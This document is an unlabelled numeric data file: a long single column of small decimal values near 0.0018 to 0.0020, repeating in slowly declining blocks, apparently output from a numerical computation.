0.0019653
0.00196129
0.00195201
0.00195251
0.00195602
0.00195602
0.00195219
0.00195615
0.00195219
0.00196532
0.0019655
0.00196124
0.00196151
0.0019655
0.00196534
0.00196149
0.00197075
0.00197467
0.0019748
0.00197044
0.0019705
0.00197464
0.00197058
0.00197078
0.00197055
0.00197479
0.00197462
0.00197053
0.00197461
0.0019708
0.00196535
0.00196121
0.00196552
0.00196129
0.00196551
0.00196538
0.00196146
0.00196532
0.0019655
0.00196151
0.00196125
0.00196534
0.0019655
0.00196149
0.00197075
0.00197467
0.0019748
0.00197044
0.00197464
0.0019705
0.00197058
0.00197078
0.00197055
0.00197462
0.00197479
0.00197461
0.0019708
0.00197053
0.00196535
0.00196121
0.00196552
0.00196129
0.00196551
0.00196146
0.00196538
0.00195221
0.00195622
0.00195605
0.00195199
0.00195603
0.00195197
0.00195223
0.00194679
0.00194275
0.00194697
0.00194267
0.00194683
0.00194696
0.00194292
0.00195219
0.00195623
0.0019561
0.00195188
0.00195202
0.00195607
0.00195194
0.00194676
0.00194695
0.0019427
0.00194296
0.00194695
0.00194678
0.00194295
0.00195222
0.00195605
0.00195622
0.00195199
0.00195603
0.00195223
0.00195197
0.00194679
0.00194275
0.00194697
0.00194267
0.00194696
0.00194683
0.00194292
0.00195219
0.00195623
0.0019561
0.00195188
0.00195607
0.00195194
0.00195202
0.00194676
0.00194695
0.00194296
0.0019427
0.00194678
0.00194695
0.00194295
0.00196532
0.0019655
0.00196151
0.00196125
0.00196534
0.0019655
0.00196149
0.00197075
0.00197467
0.00197479
0.00197043
0.00197058
0.00197464
0.0019705
0.00197078
0.00197055
0.00197462
0.00197478
0.00197079
0.00197461
0.00197053
0.00196535
0.00196121
0.00196552
0.00196129
0.00196538
0.00196551
0.00196146
0.00195221
0.00195622
0.00195605
0.00195199
0.00195603
0.00195197
0.00195223
0.00194679
0.00194275
0.00194697
0.00194267
0.00194292
0.00194683
0.00194696
0.00195219
0.00195623
0.0019561
0.00195187
0.00195606
0.00195202
0.00195194
0.00194676
0.00194695
0.0019427
0.00194296
0.00194295
0.00194694
0.00194678
0.00195221
0.00195605
0.00195622
0.00195199
0.00195604
0.00195223
0.00195197
0.00194679
0.00194275
0.00194697
0.00194267
0.00194696
0.00194683
0.00194291
0.00195218
0.00195623
0.0019561
0.00195187
0.00195607
0.00195194
0.00195202
0.00194676
0.00194695
0.00194296
0.0019427
0.00194678
0.00194694
0.00194294
0.00196544
0.00196512
0.00196147
0.00196147
0.0019653
0.0019653
0.00196129
0.00195201
0.00195251
0.00195602
0.00195602
0.00195219
0.00195616
0.00195219
0.00196532
0.0019655
0.00196151
0.00196124
0.00196534
0.0019655
0.00196149
0.00197075
0.00197467
0.00197479
0.00197044
0.00197058
0.00197464
0.0019705
0.00197078
0.00197055
0.00197462
0.00197478
0.0019708
0.00197461
0.00197053
0.00196535
0.00196121
0.00196552
0.00196129
0.00196538
0.00196551
0.00196146
0.00195221
0.00195605
0.00195622
0.00195199
0.00195604
0.00195223
0.00195197
0.00194679
0.00194275
0.00194697
0.00194267
0.00194292
0.00194683
0.00194696
0.00195219
0.00195623
0.0019561
0.00195188
0.00195607
0.00195202
0.00195194
0.00194676
0.00194695
0.00194296
0.0019427
0.00194295
0.00194679
0.00194695
0.00195221
0.00195605
0.00195622
0.00195199
0.00195603
0.00195223
0.00195197
0.0019468
0.00194275
0.00194697
0.00194267
0.00194696
0.00194683
0.00194292
0.00195219
0.00195623
0.0019561
0.00195188
0.00195607
0.00195194
0.00195202
0.00194676
0.00194695
0.00194296
0.0019427
0.00194679
0.00194695
0.00194295
0.00195201
0.00195251
0.00195602
0.00195602
0.00195615
0.00195219
0.00195219
0.00192838
0.00192805
0.00192442
0.00192442
0.00192424
0.00192824
0.00192824
0.00191501
0.0019155
0.001919
0.001919
0.00191914
0.00191519
0.00191519
0.00192825
0.00192844
0.0019242
0.00192446
0.00192844
0.00192827
0.00192444
0.00193366
0.00193757
0.0019377
0.00193335
0.00193341
0.00193753
0.00193349
0.00193369
0.00193346
0.00193769
0.00193752
0.00193345
0.0019375
0.0019337
0.00192828
0.00192417
0.00192846
0.00192425
0.00192845
0.00192832
0.00192441
0.00192825
0.00192844
0.0019242
0.00192446
0.00192844
0.00192827
0.00192444
0.00193366
0.00193757
0.0019377
0.00193336
0.00193753
0.00193342
0.0019335
0.00193369
0.00193347
0.00193769
0.00193752
0.0019375
0.00193345
0.00193371
0.00192828
0.00192417
0.00192846
0.00192425
0.00192845
0.00192441
0.00192832
0.00191521
0.00191919
0.00191903
0.00191498
0.00191901
0.00191496
0.00191522
0.00190982
0.0019058
0.00190999
0.00190571
0.00190986
0.00190998
0.00190595
0.00191518
0.00191921
0.00191908
0.00191488
0.00191502
0.00191904
0.00191494
0.00190978
0.00190997
0.00190574
0.001906
0.00190997
0.0019098
0.00190598
0.00191521
0.00191919
0.00191903
0.00191498
0.00191901
0.00191496
0.00191522
0.00190981
0.0019058
0.00190999
0.00190571
0.00190998
0.00190985
0.00190596
0.00191518
0.00191921
0.00191908
0.00191487
0.00191904
0.00191493
0.00191502
0.00190978
0.00190997
0.00190574
0.001906
0.00190997
0.0019098
0.00190599
0.00192838
0.00192805
0.00192442
0.00192442
0.00192824
0.00192824
0.00192424
0.00191501
0.0019155
0.001919
0.00191899
0.00191519
0.00191913
0.00191519
0.00192825
0.00192844
0.0019242
0.00192446
0.00192844
0.00192827
0.00192444
0.00193366
0.00193757
0.0019377
0.00193335
0.00193341
0.00193753
0.0019335
0.00193369
0.00193346
0.00193769
0.00193752
0.00193344
0.0019375
0.0019337
0.00192828
0.00192417
0.00192846
0.00192425
0.00192845
0.00192832
0.00192441
0.00192825
0.00192844
0.00192446
0.0019242
0.00192827
0.00192843
0.00192444
0.00193366
0.00193757
0.0019377
0.00193335
0.00193753
0.00193341
0.00193349
0.00193369
0.00193346
0.00193752
0.00193768
0.0019375
0.0019337
0.00193344
0.00192828
0.00192417
0.00192846
0.00192425
0.00192845
0.00192441
0.00192832
0.00191521
0.0019192
0.00191903
0.00191498
0.00191901
0.00191496
0.00191522
0.00190981
0.0019058
0.00190999
0.00190571
0.00190985
0.00190998
0.00190595
0.00191518
0.00191921
0.00191908
0.00191487
0.00191502
0.00191904
0.00191493
0.00190978
0.00190997
0.00190574
0.001906
0.00190997
0.0019098
0.00190598
0.00191521
0.00191902
0.0019192
0.00191498
0.00191901
0.00191522
0.00191496
0.00190981
0.0019058
0.00190999
0.00190571
0.00190998
0.00190985
0.00190596
0.00191518
0.00191921
0.00191908
0.00191487
0.00191904
0.00191493
0.00191502
0.00190978
0.00190997
0.001906
0.00190574
0.0019098
0.00190997
0.00190599
0.00192825
0.00192844
0.00192446
0.0019242
0.00192827
0.00192844
0.00192444
0.00193366
0.00193757
0.0019377
0.00193335
0.0019335
0.00193753
0.00193341
0.00193369
0.00193346
0.00193752
0.00193769
0.0019337
0.0019375
0.00193345
0.00192828
0.00192417
0.00192846
0.00192425
0.00192832
0.00192845
0.00192441
0.00191521
0.0019192
0.00191903
0.00191498
0.00191901
0.00191496
0.00191522
0.00190982
0.0019058
0.00191
0.00190571
0.00190596
0.00190986
0.00190998
0.00191518
0.00191921
0.00191908
0.00191487
0.00191904
0.00191502
0.00191493
0.00190978
0.00190998
0.00190574
0.00190601
0.00190599
0.00190997
0.00190981
0.00191521
0.00191903
0.0019192
0.00191498
0.00191901
0.00191522
0.00191496
0.00190982
0.0019058
0.00191
0.00190572
0.00190998
0.00190986
0.00190596
0.00191518
0.00191921
0.00191908
0.00191488
0.00191904
0.00191493
0.00191502
0.00190979
0.00190997
0.00190601
0.00190574
0.00190981
0.00190997
0.00190599
0.00192838
0.00192806
0.00192442
0.00192442
0.00192824
0.00192824
0.00192424
0.00191501
0.0019155
0.001919
0.001919
0.00191519
0.00191914
0.00191519
0.00192825
0.00192844
0.00192446
0.0019242
0.00192827
0.00192844
0.00192444
0.00193366
0.00193757
0.0019377
0.00193336
0.0019335
0.00193753
0.00193342
0.00193369
0.00193347
0.00193752
0.00193769
0.00193371
0.0019375
0.00193345
0.00192828
0.00192417
0.00192846
0.00192425
0.00192832
0.00192845
0.00192441
0.00191521
0.00191903
0.0019192
0.00191498
0.00191901
0.00191522
0.00191496
0.00190981
0.0019058
0.00191
0.00190572
0.00190596
0.00190986
0.00190998
0.00191518
0.00191921
0.00191908
0.00191488
0.00191904
0.00191502
0.00191494
0.00190978
0.00190998
0.001906
0.00190574
0.00190599
0.00190981
0.00190997
0.00191521
0.00191903
0.0019192
0.00191498
0.00191901
0.00191522
0.00191497
0.00190982
0.0019058
0.00191
0.00190572
0.00190998
0.00190986
0.00190596
0.00191518
0.00191921
0.00191908
0.00191488
0.00191904
0.00191494
0.00191502
0.00190978
0.00190997
0.001906
0.00190575
0.00190981
0.00190997
0.00190599
0.00191501
0.0019155
0.001919
0.001919
0.00191914
0.00191519
0.00191519
0.0018915
0.00189117
0.00188757
0.00188757
0.00188739
0.00189137
0.00189137
0.00187822
0.0018787
0.00188218
0.00188218
0.00188232
0.0018784
0.0018784
0.00189137
0.00189156
0.00188734
0.0018876
0.00189156
0.00189139
0.00188759
0.00189675
0.00190064
0.00190077
0.00189645
0.00189651
0.0019006
0.00189659
0.00189678
0.00189655
0.00190076
0.00190058
0.00189654
0.00190057
0.0018968
0.0018914
0.00188731
0.00189158
0.0018874
0.00189157
0.00189145
0.00188756
0.00189137
0.00189156
0.00188734
0.0018876
0.00189156
0.00189139
0.00188759
0.00189675
0.00190064
0.00190077
0.00189645
0.0019006
0.00189651
0.00189659
0.00189678
0.00189655
0.00190076
0.00190058
0.00190057
0.00189654
0.0018968
0.0018914
0.00188732
0.00189159
0.00188741
0.00189157
0.00188756
0.00189145
0.00187842
0.00188238
0.00188221
0.00187819
0.00188219
0.00187817
0.00187843
0.00187306
0.00186907
0.00187324
0.00186898
0.0018731
0.00187322
0.00186923
0.00187839
0.00188239
0.00188226
0.00187809
0.00187823
0.00188222
0.00187814
0.00187303
0.00187322
0.00186901
0.00186927
0.00187321
0.00187305
0.00186926
0.00187842
0.00188238
0.00188221
0.00187819
0.00188219
0.00187817
0.00187843
0.00187306
0.00186908
0.00187325
0.00186899
0.00187323
0.00187311
0.00186923
0.00187839
0.0018824
0.00188227
0.00187809
0.00188222
0.00187814
0.00187823
0.00187303
0.00187322
0.00186902
0.00186927
0.00187321
0.00187305
0.00186926
0.00189151
0.00189118
0.00188757
0.00188757
0.00189137
0.00189137
0.00188739
0.00187822
0.0018787
0.00188219
0.00188219
0.0018784
0.00188232
0.0018784
0.00189137
0.00189156
0.00188734
0.0018876
0.00189156
0.00189139
0.00188759
0.00189675
0.00190064
0.00190077
0.00189645
0.00189651
0.0019006
0.00189659
0.00189678
0.00189655
0.00190076
0.00190058
0.00189654
0.00190057
0.00189679
0.0018914
0.00188732
0.00189158
0.0018874
0.00189157
0.00189145
0.00188756
0.00189137
0.00189156
0.0018876
0.00188734
0.00189139
0.00189156
0.00188759
0.00189675
0.00190064
0.00190077
0.00189645
0.0019006
0.00189651
0.00189659
0.00189678
0.00189655
0.00190058
0.00190076
0.00190057
0.0018968
0.00189654
0.0018914
0.00188731
0.00189158
0.0018874
0.00189157
0.00188756
0.00189145
0.00187842
0.00188238
0.00188221
0.00187819
0.00188219
0.00187817
0.00187843
0.00187306
0.00186907
0.00187324
0.00186898
0.0018731
0.00187323
0.00186922
0.00187838
0.00188239
0.00188226
0.00187808
0.00187823
0.00188222
0.00187814
0.00187303
0.00187322
0.00186901
0.00186927
0.00187321
0.00187305
0.00186926
0.00187842
0.00188221
0.00188238
0.00187819
0.00188219
0.00187843
0.00187817
0.00187306
0.00186908
0.00187324
0.00186899
0.00187323
0.0018731
0.00186923
0.00187839
0.00188239
0.00188226
0.00187808
0.00188222
0.00187814
0.00187823
0.00187303
0.00187322
0.00186927
0.00186902
0.00187304
0.00187322
0.00186926
0.00189138
0.00189157
0.00188761
0.00188735
0.0018914
0.00189157
0.00188759
0.00189676
0.00190065
0.00190077
0.00189645
0.0018966
0.0019006
0.00189651
0.00189679
0.00189656
0.00190059
0.00190076
0.0018968
0.00190057
0.00189654
0.00189141
0.00188732
0.00189159
0.00188741
0.00189145
0.00189158
0.00188756
0.00187842
0.00188238
0.00188221
0.00187819
0.00188219
0.00187817
0.00187843
0.00187306
0.00186908
0.00187324
0.00186899
0.00186923
0.00187311
0.00187323
0.00187839
0.00188239
0.00188227
0.00187809
0.00188222
0.00187823
0.00187815
0.00187303
0.00187322
0.00186902
0.00186928
0.00186927
0.00187322
0.00187305
0.00187842
0.00188221
0.00188238
0.00187819
0.0018822
0.00187843
0.00187818
0.00187307
0.00186908
0.00187325
0.00186899
0.00187323
0.00187311
0.00186923
0.00187839
0.0018824
0.00188227
0.00187809
0.00188223
0.00187815
0.00187823
0.00187303
0.00187322
0.00186928
0.00186902
0.00187305
0.00187322
0.00186926
0.0018915
0.00189118
0.00188757
0.00188757
0.00189137
0.00189137
0.00188739
0.00187822
0.0018787
0.00188218
0.00188218
0.0018784
0.00188232
0.00187839
0.00189138
0.00189157
0.00188761
0.00188735
0.0018914
0.00189156
0.00188759
0.00189676
0.00190065
0.00190078
0.00189645
0.0018966
0.0019006
0.00189651
0.00189679
0.00189656
0.00190059
0.00190076
0.0018968
0.00190057
0.00189654
0.00189141
0.00188732
0.00189159
0.00188741
0.00189145
0.00189158
0.00188756
0.00187842
0.00188221
0.00188238
0.00187819
0.00188219
0.00187843
0.00187817
0.00187306
0.00186908
0.00187324
0.00186899
0.00186923
0.00187311
0.00187323
0.00187839
0.00188239
0.00188226
0.00187809
0.00188222
0.00187823
0.00187814
0.00187303
0.00187322
0.00186928
0.00186902
0.00186926
0.00187305
0.00187322
0.00187842
0.00188221
0.00188239
0.00187819
0.00188219
0.00187843
0.00187817
0.00187306
0.00186908
0.00187325
0.00186899
0.00187323
0.00187311
0.00186923
0.00187839
0.0018824
0.00188227
0.00187809
0.00188223
0.00187815
0.00187824
0.00187303
0.00187322
0.00186928
0.00186902
0.00187305
0.00187322
0.00186926
0.00187822
0.00187871
0.00188219
0.00188219
0.00188233
0.0018784
0.0018784
0.00185489
0.00185456
0.00185098
0.00185098
0.0018508
0.00185475
0.00185475
0.0018417
0.00184218
0.00184564
0.00184564
0.00184578
0.00184188
0.00184188
0.00185476
0.00185495
0.00185076
0.00185101
0.00185494
0.00185477
0.001851
0.00186009
0.00186396
0.00186408
0.00185979
0.00185985
0.00186391
0.00185994
0.00186012
0.00185989
0.00186407
0.00186389
0.00185988
0.00186388
0.00186013
0.00185478
0.00185073
0.00185497
0.00185082
0.00185495
0.00185483
0.00185097
0.00185475
0.00185494
0.00185076
0.00185101
0.00185494
0.00185477
0.001851
0.00186009
0.00186396
0.00186409
0.00185979
0.00186391
0.00185985
0.00185994
0.00186012
0.00185989
0.00186407
0.00186389
0.00186388
0.00185988
0.00186013
0.00185478
0.00185073
0.00185497
0.00185082
0.00185495
0.00185097
0.00185483
0.0018419
0.00184583
0.00184566
0.00184168
0.00184564
0.00184166
0.00184191
0.00183659
0.00183264
0.00183678
0.00183255
0.00183664
0.00183676
0.00183279
0.00184187
0.00184585
0.00184572
0.00184158
0.00184172
0.00184567
0.00184163
0.00183656
0.00183675
0.00183258
0.00183283
0.00183675
0.00183657
0.00183282
0.0018419
0.00184584
0.00184566
0.00184168
0.00184564
0.00184166
0.00184191
0.00183659
0.00183265
0.00183678
0.00183255
0.00183676
0.00183664
0.00183279
0.00184187
0.00184585
0.00184572
0.00184158
0.00184568
0.00184163
0.00184173
0.00183656
0.00183675
0.00183258
0.00183283
0.00183674
0.00183657
0.00183282
0.00185489
0.00185456
0.00185099
0.00185099
0.00185476
0.00185475
0.00185081
0.00184171
0.00184219
0.00184564
0.00184564
0.00184189
0.00184578
0.00184189
0.00185475
0.00185494
0.00185076
0.00185101
0.00185494
0.00185477
0.001851
0.00186009
0.00186396
0.00186408
0.00185979
0.00185985
0.00186391
0.00185994
0.00186012
0.00185989
0.00186407
0.00186389
0.00185988
0.00186388
0.00186013
0.00185478
0.00185072
0.00185497
0.00185082
0.00185495
0.00185483
0.00185097
0.00185475
0.00185494
0.00185101
0.00185075
0.00185477
0.00185494
0.001851
0.00186009
0.00186396
0.00186408
0.00185979
0.00186391
0.00185985
0.00185994
0.00186012
0.00185989
0.00186389
0.00186407
0.00186388
0.00186013
0.00185988
0.00185478
0.00185073
0.00185497
0.00185082
0.00185496
0.00185097
0.00185483
0.0018419
0.00184583
0.00184566
0.00184167
0.00184564
0.00184165
0.00184191
0.00183658
0.00183264
0.00183677
0.00183255
0.00183664
0.00183675
0.00183278
0.00184187
0.00184585
0.00184572
0.00184157
0.00184172
0.00184567
0.00184163
0.00183655
0.00183674
0.00183258
0.00183283
0.00183674
0.00183657
0.00183282
0.0018419
0.00184566
0.00184583
0.00184167
0.00184564
0.00184191
0.00184166
0.00183658
0.00183264
0.00183677
0.00183255
0.00183676
0.00183664
0.00183278
0.00184187
0.00184584
0.00184572
0.00184157
0.00184567
0.00184163
0.00184172
0.00183655
0.00183674
0.00183283
0.00183257
0.00183657
0.00183674
0.00183282
0.00185476
0.00185495
0.00185102
0.00185076
0.00185478
0.00185495
0.00185101
0.0018601
0.00186396
0.00186409
0.0018598
0.00185994
0.00186392
0.00185985
0.00186013
0.0018599
0.0018639
0.00186408
0.00186014
0.00186389
0.00185988
0.00185479
0.00185074
0.00185498
0.00185083
0.00185484
0.00185496
0.00185097
0.00184191
0.00184584
0.00184566
0.00184168
0.00184565
0.00184166
0.00184191
0.00183659
0.00183265
0.00183678
0.00183255
0.00183279
0.00183664
0.00183676
0.00184187
0.00184585
0.00184573
0.00184158
0.00184568
0.00184173
0.00184164
0.00183656
0.00183675
0.00183258
0.00183284
0.00183282
0.00183675
0.00183658
0.00184191
0.00184566
0.00184584
0.00184168
0.00184565
0.00184192
0.00184167
0.00183659
0.00183265
0.00183678
0.00183256
0.00183676
0.00183664
0.00183279
0.00184188
0.00184586
0.00184573
0.00184158
0.00184568
0.00184164
0.00184173
0.00183656
0.00183675
0.00183284
0.00183258
0.00183658
0.00183675
0.00183282
0.00185489
0.00185456
0.00185098
0.00185098
0.00185475
0.00185475
0.00185081
0.0018417
0.00184218
0.00184564
0.00184564
0.00184188
0.00184578
0.00184188
0.00185476
0.00185495
0.00185102
0.00185076
0.00185478
0.00185495
0.001851
0.0018601
0.00186396
0.00186409
0.0018598
0.00185995
0.00186392
0.00185986
0.00186013
0.0018599
0.0018639
0.00186408
0.00186014
0.00186388
0.00185988
0.00185479
0.00185073
0.00185498
0.00185083
0.00185484
0.00185496
0.00185097
0.0018419
0.00184566
0.00184584
0.00184167
0.00184564
0.00184191
0.00184166
0.00183659
0.00183265
0.00183678
0.00183255
0.00183279
0.00183664
0.00183676
0.00184187
0.00184585
0.00184572
0.00184158
0.00184567
0.00184172
0.00184163
0.00183656
0.00183675
0.00183283
0.00183258
0.00183282
0.00183658
0.00183674
0.0018419
0.00184566
0.00184584
0.00184168
0.00184565
0.00184191
0.00184166
0.00183659
0.00183265
0.00183678
0.00183255
0.00183677
0.00183664
0.00183279
0.00184187
0.00184585
0.00184573
0.00184158
0.00184568
0.00184164
0.00184173
0.00183656
0.00183675
0.00183283
0.00183258
0.00183657
0.00183675
0.00183282
0.00184171
0.00184219
0.00184565
0.00184565
0.00184579
0.00184189
0.00184189
0.00181858
0.00181824
0.0018147
0.0018147
0.00181452
0.00181844
0.00181844
0.0018055
0.00180597
0.0018094
0.0018094
0.00180955
0.00180568
0.00180567
0.00181844
0.00181863
0.00181448
0.00181473
0.00181863
0.00181845
0.00181471
0.00182373
0.00182757
0.00182769
0.00182344
0.00182349
0.00182752
0.00182359
0.00182376
0.00182354
0.00182768
0.0018275
0.00182352
0.00182749
0.00182377
0.00181847
0.00181445
0.00181866
0.00181455
0.00181864
0.00181852
0.00181468
0.00181844
0.00181863
0.00181448
0.00181473
0.00181863
0.00181845
0.00181471
0.00182373
0.00182757
0.00182769
0.00182344
0.00182752
0.00182349
0.00182359
0.00182376
0.00182354
0.00182768
0.0018275
0.00182749
0.00182352
0.00182377
0.00181847
0.00181445
0.00181866
0.00181455
0.00181864
0.00181468
0.00181852
0.00180569
0.0018096
0.00180941
0.00180547
0.0018094
0.00180546
0.0018057
0.00180042
0.00179652
0.00180062
0.00179642
0.00180048
0.0018006
0.00179665
0.00180566
0.00180961
0.00180949
0.00180538
0.00180552
0.00180943
0.00180543
0.00180039
0.00180059
0.00179645
0.00179669
0.00180059
0.0018004
0.00179669
0.00180569
0.0018096
0.00180941
0.00180547
0.0018094
0.00180546
0.0018057
0.00180042
0.00179652
0.00180062
0.00179643
0.00180061
0.00180048
0.00179665
0.00180566
0.00180961
0.00180949
0.00180538
0.00180943
0.00180543
0.00180553
0.00180039
0.00180059
0.00179645
0.00179669
0.00180059
0.0018004
0.00179668
0.00181858
0.00181824
0.0018147
0.0018147
0.00181844
0.00181844
0.00181452
0.0018055
0.00180597
0.0018094
0.0018094
0.00180568
0.00180954
0.00180567
0.00181843
0.00181863
0.00181448
0.00181472
0.00181862
0.00181845
0.00181471
0.00182373
0.00182757
0.00182769
0.00182344
0.00182349
0.00182752
0.00182359
0.00182376
0.00182353
0.00182768
0.0018275
0.00182352
0.00182748
0.00182377
0.00181846
0.00181445
0.00181866
0.00181455
0.00181864
0.00181852
0.00181468
0.00181843
0.00181863
0.00181472
0.00181448
0.00181845
0.00181862
0.00181471
0.00182372
0.00182757
0.00182769
0.00182343
0.00182751
0.00182349
0.00182358
0.00182376
0.00182353
0.0018275
0.00182768
0.00182748
0.00182377
0.00182352
0.00181846
0.00181445
0.00181865
0.00181454
0.00181864
0.00181468
0.00181852
0.00180569
0.0018096
0.00180941
0.00180547
0.0018094
0.00180546
0.0018057
0.00180042
0.00179652
0.00180062
0.00179643
0.00180048
0.0018006
0.00179665
0.00180566
0.00180962
0.00180949
0.00180538
0.00180552
0.00180943
0.00180543
0.00180039
0.00180059
0.00179645
0.00179669
0.00180059
0.0018004
0.00179668
0.00180569
0.00180941
0.0018096
0.00180547
0.0018094
0.0018057
0.00180545
0.00180042
0.00179652
0.00180062
0.00179642
0.0018006
0.00180048
0.00179665
0.00180566
0.00180961
0.00180949
0.00180538
0.00180943
0.00180543
0.00180552
0.00180039
0.00180059
0.00179669
0.00179645
0.0018004
0.00180059
0.00179668
0.00181844
0.00181863
0.00181473
0.00181448
0.00181845
0.00181863
0.00181472
0.00182373
0.00182757
0.0018277
0.00182344
0.00182359
0.00182752
0.0018235
0.00182376
0.00182354
0.0018275
0.00182768
0.00182377
0.00182749
0.00182352
0.00181847
0.00181445
0.00181866
0.00181455
0.00181852
0.00181865
0.00181468
0.00180569
0.0018096
0.00180941
0.00180547
0.0018094
0.00180545
0.0018057
0.00180042
0.00179652
0.00180062
0.00179642
0.00179665
0.00180048
0.0018006
0.00180566
0.00180961
0.00180949
0.00180538
0.00180943
0.00180553
0.00180543
0.00180039
0.00180059
0.00179645
0.0017967
0.00179669
0.00180059
0.00180041
0.00180569
0.00180941
0.0018096
0.00180547
0.0018094
0.0018057
0.00180545
0.00180042
0.00179652
0.00180062
0.00179642
0.0018006
0.00180048
0.00179665
0.00180566
0.00180961
0.00180949
0.00180538
0.00180943
0.00180543
0.00180552
0.00180039
0.00180058
0.0017967
0.00179645
0.00180041
0.00180059
0.00179668
0.00181857
0.00181824
0.00181469
0.00181469
0.00181844
0.00181843
0.00181452
0.0018055
0.00180596
0.0018094
0.0018094
0.00180567
0.00180954
0.00180567
0.00181843
0.00181863
0.00181473
0.00181448
0.00181845
0.00181863
0.00181471
0.00182373
0.00182757
0.00182769
0.00182344
0.00182359
0.00182752
0.00182349
0.00182376
0.00182354
0.0018275
0.00182768
0.00182377
0.00182749
0.00182352
0.00181847
0.00181445
0.00181866
0.00181455
0.00181852
0.00181864
0.00181468
0.00180569
0.00180941
0.0018096
0.00180547
0.0018094
0.0018057
0.00180546
0.00180042
0.00179652
0.00180061
0.00179642
0.00179665
0.00180048
0.00180059
0.00180566
0.00180961
0.00180948
0.00180537
0.00180943
0.00180552
0.00180543
0.00180039
0.00180059
0.00179669
0.00179645
0.00179668
0.0018004
0.00180058
0.00180569
0.00180941
0.0018096
0.00180547
0.0018094
0.0018057
0.00180545
0.00180042
0.00179652
0.00180062
0.00179642
0.0018006
0.00180048
0.00179665
0.00180566
0.00180961
0.00180949
0.00180538
0.00180943
0.00180543
0.00180552
0.00180039
0.00180059
0.00179669
0.00179645
0.0018004
0.00180059
0.00179668
0.0018055
0.00180597
0.0018094
0.0018094
0.00180954
0.00180567
0.00180567
0.00178257
0.00178222
0.00177871
0.00177871
0.00177854
0.00178243
0.00178243
0.00176959
0.00177004
0.00177346
0.00177346
0.00177361
0.00176976
0.00176976
0.00178242
0.00178262
0.00177849
0.00177874
0.00178262
0.00178243
0.00177873
0.00178767
0.00179149
0.0017916
0.00178739
0.00178744
0.00179143
0.00178754
0.0017877
0.00178748
0.00179159
0.0017914
0.00178747
0.0017914
0.00178771
0.00178245
0.00177847
0.00178265
0.00177857
0.00178263
0.00178251
0.00177869
0.00178242
0.00178262
0.0017785
0.00177874
0.00178262
0.00178243
0.00177873
0.00178767
0.00179149
0.00179161
0.00178739
0.00179143
0.00178744
0.00178754
0.0017877
0.00178748
0.0017916
0.0017914
0.00179139
0.00178747
0.00178771
0.00178245
0.00177847
0.00178265
0.00177857
0.00178263
0.00177869
0.00178251
0.00176977
0.00177366
0.00177346
0.00176955
0.00177345
0.00176954
0.00176978
0.00176454
0.00176068
0.00176475
0.00176058
0.00176461
0.00176473
0.0017608
0.00176974
0.00177367
0.00177355
0.00176947
0.00176961
0.00177349
0.00176952
0.00176451
0.00176471
0.0017606
0.00176084
0.00176471
0.00176452
0.00176083
0.00176977
0.00177365
0.00177346
0.00176955
0.00177345
0.00176954
0.00176978
0.00176454
0.00176068
0.00176475
0.00176058
0.00176473
0.00176461
0.0017608
0.00176974
0.00177367
0.00177354
0.00176947
0.00177349
0.00176952
0.00176961
0.00176451
0.00176471
0.0017606
0.00176084
0.00176471
0.00176452
0.00176083
0.00178257
0.00178221
0.00177871
0.00177871
0.00178243
0.00178242
0.00177854
0.00176959
0.00177004
0.00177346
0.00177346
0.00176976
0.00177361
0.00176976
0.00178242
0.00178262
0.00177849
0.00177873
0.00178262
0.00178243
0.00177873
0.00178767
0.00179148
0.0017916
0.00178739
0.00178744
0.00179142
0.00178754
0.0017877
0.00178748
0.00179159
0.0017914
0.00178747
0.00179139
0.00178771
0.00178245
0.00177847
0.00178265
0.00177857
0.00178263
0.00178251
0.00177869
0.00178242
0.00178262
0.00177873
0.00177849
0.00178243
0.00178261
0.00177873
0.00178767
0.00179148
0.0017916
0.00178739
0.00179142
0.00178744
0.00178753
0.0017877
0.00178748
0.0017914
0.00179159
0.00179139
0.00178771
0.00178746
0.00178244
0.00177847
0.00178265
0.00177856
0.00178262
0.00177869
0.00178251
0.00176977
0.00177365
0.00177346
0.00176955
0.00177345
0.00176954
0.00176978
0.00176454
0.00176068
0.00176475
0.00176058
0.0017646
0.00176472
0.0017608
0.00176974
0.00177367
0.00177355
0.00176947
0.00176961
0.00177349
0.00176952
0.00176451
0.00176472
0.0017606
0.00176084
0.00176471
0.00176452
0.00176083
0.00176978
0.00177346
0.00177365
0.00176955
0.00177345
0.00176978
0.00176954
0.00176454
0.00176068
0.00176475
0.00176058
0.00176472
0.0017646
0.0017608
0.00176974
0.00177367
0.00177355
0.00176947
0.00177349
0.00176951
0.00176961
0.00176451
0.00176472
0.00176084
0.0017606
0.00176452
0.00176471
0.00176083
0.00178242
0.00178262
0.00177873
0.00177849
0.00178243
0.00178262
0.00177872
0.00178767
0.00179148
0.00179161
0.00178739
0.00178753
0.00179142
0.00178744
0.0017877
0.00178748
0.0017914
0.00179159
0.00178771
0.00179139
0.00178746
0.00178245
0.00177847
0.00178264
0.00177856
0.00178251
0.00178262
0.00177869
0.00176977
0.00177365
0.00177346
0.00176955
0.00177345
0.00176954
0.00176978
0.00176454
0.00176067
0.00176474
0.00176058
0.0017608
0.0017646
0.00176472
0.00176974
0.00177367
0.00177355
0.00176947
0.00177349
0.00176961
0.00176951
0.00176451
0.00176471
0.0017606
0.00176084
0.00176083
0.00176471
0.00176452
0.00176977
0.00177346
0.00177365
0.00176955
0.00177345
0.00176978
0.00176954
0.00176454
0.00176067
0.00176474
0.00176057
0.00176472
0.0017646
0.00176079
0.00176974
0.00177367
0.00177354
0.00176946
0.00177348
0.00176951
0.00176961
0.00176451
0.00176471
0.00176084
0.0017606
0.00176452
0.00176471
0.00176083
0.00178256
0.00178222
0.00177871
0.00177871
0.00178242
0.00178242
0.00177854
0.00176959
0.00177004
0.00177346
0.00177346
0.00176976
0.0017736
0.00176976
0.00178241
0.00178262
0.00177873
0.00177849
0.00178243
0.00178261
0.00177872
0.00178767
0.00179148
0.00179161
0.00178738
0.00178753
0.00179142
0.00178744
0.0017877
0.00178748
0.0017914
0.00179159
0.00178771
0.00179139
0.00178746
0.00178245
0.00177846
0.00178264
0.00177856
0.00178251
0.00178263
0.00177869
0.00176977
0.00177346
0.00177364
0.00176955
0.00177345
0.00176977
0.00176953
0.00176454
0.00176068
0.00176475
0.00176057
0.0017608
0.00176461
0.00176472
0.00176974
0.00177366
0.00177354
0.00176946
0.00177348
0.00176961
0.00176951
0.0017645
0.0017647
0.00176084
0.0017606
0.00176083
0.00176452
0.00176471
0.00176977
0.00177346
0.00177365
0.00176955
0.00177345
0.00176977
0.00176954
0.00176454
0.00176067
0.00176474
0.00176057
0.00176472
0.0017646
0.0017608
0.00176974
0.00177366
0.00177354
0.00176946
0.00177348
0.00176951
0.00176961
0.0017645
0.0017647
